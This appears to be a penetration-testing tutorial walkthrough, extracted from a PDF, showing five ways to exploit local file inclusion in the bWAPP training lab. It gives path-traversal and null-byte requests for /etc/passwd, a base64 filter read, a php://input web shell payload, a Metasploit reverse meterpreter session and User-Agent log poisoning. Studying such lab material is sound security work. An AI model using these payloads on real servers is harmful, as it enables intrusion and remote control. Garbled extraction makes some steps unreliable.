5 Ways To Exploit LFi
5 Ways To Exploit LFi
5 Ways To Exploit LFi
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Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug
remote & local le Inclusion then click on hack.
Here the requested web page which suffering from RFI & LFI Vulnerability gets open.
Where you will nd a comment to select a language from the given drop down list, and
when you click on go button the selected language le get included in URL. To perform
basic attacks manipulate
In basic LFI attack we can directly read the content of a le from its directories using (../) or
simply (/), now if you will notice the given below screenshot you will nd that I have access
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the password le when the above URL is executed in the browser. Categories
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le when executing the same path in URL. So when we face such kind of problem then go
for NULL BYTE attack. Articles
Now turn on burp suite to capture the browser request then select proxy tab and start
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intercept. Do not forget to set browser proxy while making use of burp suite
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Now inside burp suite send the intercepted data into repeater.
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Inside repeater you can do analysis of sent request and response generated by it. From
screenshot it will be clear that /etc/passwd is not working and I am not able to read the
password le.
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From following screenshot you can see I had forward the request by adding null character
(%00) at the end of directory /etc/passwd%00 and click on go tab. Then on the right sight
of window the password le get open as response.
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Base64 encoded
Now there is another way to exploit LFI when the security level is high and you are unable
to view the PHP le content, and then use the following PHP function.
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Here from the screenshot you can see the content of password le is encoded into base64;
copy the whole encoded text.
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Now a pop-up box will get open past the copied encoded text inside it and click on ok
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From the given screenshot you can view the result and read the content of password le.
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PHP Input
Using PHP input function we will execute injected PHP code to exploit LFI vulnerability.
With the help of hackbar I am going to perform this task in which rst we need to load the
URL of the targeted web page as you can see in the given screenshot.
http:// .php?language=lang_en.php&action=go
http:// .php?language=php://input&cmd=ls
Then select the check box to enable Post data which will forward the post request and add
cmd comment in given text area<?php system($_GET[‘cmd’]); ?>as shown in following
screenshot, nally click on execute.
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This will show directories of victim PC.
Now time to connect the victim through reverse connection; open terminal in kali Linux
and type msfconsole to start metasploit framework.
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msf exploit (web_delivery)>exploit
Paste above copied PHP code inside the URL as shown in the image and execute it.
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When above URL get execute the attacker got victim’s meterpreter session inside the
meterpreter> sysinfo
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If the server is outdated then to exploit it through LFI we can include proc/self/environ le
that stores User_Agent where we will place our PHP code for executing CMD command.
http:// /?page=proc/self/environ
Now start burp suite and capture the browser request and send the fetch data into
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Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the
request with GET parameter /l .php?
le=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right
side of window you can see the highlight result as response.
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Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an
Information Security Consultant Social Media Lover and Gadgets. Contact here
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Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking
Industry. At present other than his name he can also be called as An Ethical Hacker,
A Cyber Security Expert, A Penetration Tester. With years of quality Experience in
IT and software industry
Hi Raj, I tried to do null byte on DVWA but its not working. I added %00
after etc/passwd but its not working and i get response as le not found.
Any suggestions please.
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